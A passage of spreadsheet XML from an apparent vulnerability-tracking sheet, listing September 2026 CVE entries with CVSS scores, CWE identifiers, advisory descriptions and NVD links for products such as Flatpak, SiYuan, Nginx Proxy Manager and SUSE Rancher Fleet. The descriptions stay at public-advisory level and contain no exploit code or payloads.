      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Rebuild up to 4.4.7/4.5.0-beta5. This affects an unknown part of the file /user/login of the component Login Endpoint. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102248</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102249</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in REBUILD up to 4.4.11. This vulnerability affects unknown code of the file /commons/file-editor-save. The manipulation of the argument url/fileKey results in missing authorization. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102249</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12267</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to Command injection in Windows DNS Query Resolution Policy name field leading to remote code execution.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12267</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86330</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>An OS command injection flaw was found in the set_hostname_internal function of NooBaa's cluster_internal_api. This component is responsible for managing the Multi-Cloud Object Gateway in OpenShift Data Foundation. The vulnerability occurs because the hostname parameter is passed directly to a shell command without proper sanitization. An authenticated attacker with administrative privileges can provide a specially crafted hostname containing shell metacharacters to execute arbitrary commands on the host system with the privileges of the NooBaa process.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86330</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96326</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Rich Text Editor Field in all versions up to, and including, 2.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96326</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101091</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>SiYuan versions before v3.8.4 fail to properly validate SQL statements in block query embed blocks executed against siyuan.db. Attackers can craft malicious .sy documents with non-read-only SQL statements that execute automatically during background indexing, rendering, or export operations without authentication.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101091</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102335</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>nginx, gin</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Nginx Proxy Manager through 2.16.0 fails to restrict the advanced_config field to administrators, allowing non-admin users with manage permissions to inject arbitrary nginx directives. Attackers can inject malicious nginx configuration such as alias directives to serve arbitrary files or control routing for their assigned hosts.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102335</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15952</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@ch.abb.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in ABB Protection and control IED manager (PCM600).
This issue affects Protection and control IED manager (PCM600): through 2.14.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15952</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52748</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>The Kaon AR2140X router contains a vulnerability where the backup functionality is accessible without authentication. This allows an unauthenticated remote attacker to trigger a configuration backup and retrieve it in a form encrypted by a device-specific key. Triggering this function renders the router inoperable for a substantial period of time. 
This issue was identified in firmware versions up to 4.2.17. Status of newer versions remains unknown.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52748</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55096</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>fast-mcp-t</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55096</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87114</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>docker, rust</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in kube-compare. When processing a 'container://' reference path, the tool incorrectly executes an untrusted container image's entrypoint instead of merely extracting data from a stopped container. This allows a remote attacker to achieve arbitrary code execution on the operator's workstation. If the Docker daemon requires elevated privileges, the untrusted code may execute with root-mediated daemon privileges, posing a significant security risk.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87114</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90925</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Innotim Software, Telecommunications and Consultancy Trade Ltd. Co. Logsign SIEM allows Path Traversal.
This issue affects Logsign SIEM: from 6.4.101 before 6.4.117.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90925</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93538</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-639</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>A cross-tenant authorization issue was discovered in SUSE Rancher Fleet. During agent-initiated cluster registration, cluster labels supplied by the registering agent, including labels in the reserved management.cattle.io/ namespace such as the cluster display name label, were applied to the resulting upstream Cluster object. Because Fleet resolves GitRepo and Bundle targets from those cluster labels, a party able to register a cluster into a Fleet workspace namespace shared with other tenants could cause its own cluster to satisfy targeting rules that administrators intended for a different cluster.
This affects SUSE Rancher Fleet 0.16 before 0.16.1, 0.15 before 0.15.6, 0.14 before 0.14.10, 0.13 before 0.13.15, 0.12 before 0.12.19 and older versions.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93538</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94286</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in libXtst's RECORD reply parser in libXtst before 1.2.6 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94286</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97023</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in Flatpak's handling of the export/bin directory during app deployment allows a malicious Flatpak app to cause deletion of attacker-chosen files outside the deployment directory when the app is installed or upgraded. In system-wide installations, the deletion is performed as root.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97023</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97024</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability in Flatpak's handling of the files/etc directory during app deployment allows a malicious Flatpak app to cause certain host system files (such as passwd, group, machine-id, or resolv.conf) to be emptied or replaced with a symlink when the app is installed or upgraded. In system-wide installations, the write is performed as root.</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97024</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97685</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>help@fluidattacks.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
